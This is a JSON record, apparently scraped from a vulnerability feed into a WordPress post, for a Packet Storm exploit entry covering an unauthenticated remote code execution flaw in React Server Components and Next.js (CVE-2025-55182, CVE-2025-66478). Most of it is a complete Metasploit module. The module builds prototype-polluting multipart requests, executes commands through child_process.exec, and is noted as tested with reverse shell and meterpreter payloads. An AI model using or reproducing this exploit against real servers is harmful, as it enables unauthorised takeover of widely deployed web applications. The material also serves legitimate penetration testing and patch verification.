{“lastseen”:”2025-12-09T17:45:58″,”description”:”A critical unauthenticated remote code execution vulnerability exists in React Server Components RSC Flight protocol. The vulnerability allows attackers to achieve prototype pollution during deserialization of RSC payloads by sending specially crafted…”,”published”:”2025-12-09T00:00:00″,”modified”:”2025-12-09T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 React \/ Next.js Unauthenticated Remote Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:212599″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-55182″,”CVE-2025-66478″],”sourceData”:”##\\n # This module requires Metasploit: https:\/\/metasploit.com\/download\\n # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n ##\\n \\n class MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = ExcellentRanking\\n \\n include Msf::Exploit::Remote::HttpClient\\n prepend Msf::Exploit::Remote::AutoCheck\\n \\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Unauthenticated RCE in React and Next.js’,\\n ‘Description’ =\\u003e %q{\\n A critical unauthenticated Remote Code Execution (RCE) vulnerability exists in React Server\\n Components (RSC) Flight protocol. The vulnerability allows attackers to achieve prototype\\n pollution during deserialization of RSC payloads by sending specially crafted multipart\\n requests with \\”__proto__\\”, \\”constructor\\”, or \\”prototype\\” as module names.\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [\\n ‘Maksim Rogov’, # Metasploit Module\\n ‘Lachlan Davidson’, # Vulnerability Discovery\\n ‘maple3142’ # Public Exploit\\n ],\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2025-55182’],\\n [‘CVE’, ‘2025-66478’],\\n [‘URL’, ‘https:\/\/react.dev\/blog\/2025\/12\/03\/critical-security-vulnerability-in-react-server-components’],\\n [‘URL’, ‘https:\/\/gist.github.com\/maple3142\/48bc9393f45e068cf8c90ab865c0f5f3’]\\n ],\\n ‘Platform’ =\\u003e [‘multi’],\\n ‘Arch’ =\\u003e [ARCH_CMD],\\n ‘Targets’ =\\u003e [\\n [\\n ‘Unix Command’,\\n {\\n ‘Platform’ =\\u003e [‘unix’, ‘linux’],\\n ‘DefaultOptions’ =\\u003e {\\n ‘FETCH_COMMAND’ =\\u003e ‘WGET’\\n }\\n # Tested with cmd\/unix\/reverse_bash\\n # Tested with cmd\/linux\/http\/x64\/meterpreter\/reverse_tcp\\n }\\n ],\\n [\\n ‘Windows Command’,\\n {\\n ‘Platform’ =\\u003e [‘windows’]\\n # Tested with cmd\/windows\/http\/x64\/meterpreter\/reverse_tcp\\n }\\n ],\\n ],\\n ‘Payload’ =\\u003e {\\n ‘BadChars’ =\\u003e ‘\\”‘\\n },\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘DisclosureDate’ =\\u003e ‘2025-12-03’,\\n ‘Notes’ =\\u003e {\\n ‘AKA’ =\\u003e [‘React2Shell’],\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘SideEffects’ =\\u003e [IOC_IN_LOGS],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION]\\n }\\n )\\n )\\n \\n register_options(\\n [\\n OptString.new(‘TARGETURI’, [true, ‘Path to the React App’, ‘\/’]),\\n ]\\n )\\n end\\n \\n def build_malicious_chunk(ref_idx, reason, get_token, node_payload)\\n {\\n ‘then’ =\\u003e \\”$#{ref_idx}:then\\”,\\n ‘status’ =\\u003e ‘resolved_model’,\\n ‘reason’ =\\u003e reason,\\n ‘value’ =\\u003e { ‘then’ =\\u003e ‘$B’ }.to_json,\\n ‘_response’ =\\u003e {\\n ‘_prefix’ =\\u003e node_payload,\\n ‘_formData’ =\\u003e {\\n ‘get’ =\\u003e \\”$#{ref_idx}:#{get_token}:constructor\\”\\n }\\n }\\n }.to_json\\n end\\n \\n def get_random_value\\n random_string = Rex::Text.rand_text_alphanumeric(6..14).upcase\\n [‘\\”\\”‘, ‘{}’, ‘[]’, ‘null’, ‘undefined’, ‘true’, ‘false’, \\”\\\\\\”#{random_string}\\\\\\”\\”].sample\\n end\\n \\n def build_post_data(node_payload)\\n random_reason = -Rex::Text.rand_text_numeric(1, ‘0’).to_i\\n random_ref_idx = Rex::Text.rand_text_numeric(1, ‘0’).to_i\\n random_get_token = [‘then’, ‘constructor’].sample\\n \\n chunk = build_malicious_chunk(random_ref_idx, random_reason, random_get_token, node_payload)\\n \\n post_data = Rex::MIME::Message.new\\n post_data.add_part(chunk, nil, nil, ‘form-data; name=\\”0\\”‘)\\n \\n cycle_length = rand(random_ref_idx..9)\\n (1..cycle_length).each do |i|\\n value = (i == random_ref_idx) ? \\”\\\\\\”$@#{random_ref_idx}\\\\\\”\\” : get_random_value\\n post_data.add_part(value, nil, nil, \\”form-data; name=\\\\\\”#{i}\\\\\\”\\”)\\n end\\n \\n post_data\\n end\\n \\n def send_payload(node_payload)\\n post_data = build_post_data(node_payload)\\n \\n send_request_cgi(\\n ‘uri’ =\\u003e normalize_uri(target_uri.path),\\n ‘method’ =\\u003e ‘POST’,\\n ‘headers’ =\\u003e { ‘Next-Action’ =\\u003e ” },\\n ‘ctype’ =\\u003e \\”multipart\/form-data; boundary=#{post_data.bound}\\”,\\n ‘data’ =\\u003e post_data.to_s\\n )\\n end\\n \\n def check\\n random_id = Rex::Text.rand_text_alphanumeric(8..16).upcase\\n node_payload = \\”throw Object.assign(new Error(‘NEXT_REDIRECT’),{digest:`NEXT_REDIRECT;push;\/#{random_id};307;`});\\”\\n \\n res = send_payload(node_payload)\\n return CheckCode::Unknown(\\”#{peer} – No response from web service\\”) unless res\\n \\n headers_text = res.headers.to_s\\n return CheckCode::Appears if res.code == 303 \\u0026\\u0026 headers_text.include?(\\”\/#{random_id};push\\”)\\n \\n CheckCode::Safe(\\”The target #{target_uri} is not vulnerable\\”)\\n end\\n \\n def exploit\\n node_payload = \\”process.mainModule.require(‘child_process’).exec(\\\\\\”#{payload.encoded}\\\\\\”,{detached:true,stdio:’ignore’},function(){});\\”\\n send_payload(node_payload)\\n end\\n end”,”sourceHref”:”https:\/\/packetstorm.news\/download\/212599″,”cvss”:{“score”:10,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:C\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/212599\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-12-09T17:45:58″,”description”:”A critical unauthenticated remote code execution vulnerability exists in React Server Components RSC Flight protocol. The vulnerability allows attackers to achieve prototype pollution during deserialization…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,36,12,13,53,7,11,5],"class_list":["post-29735","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-100","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n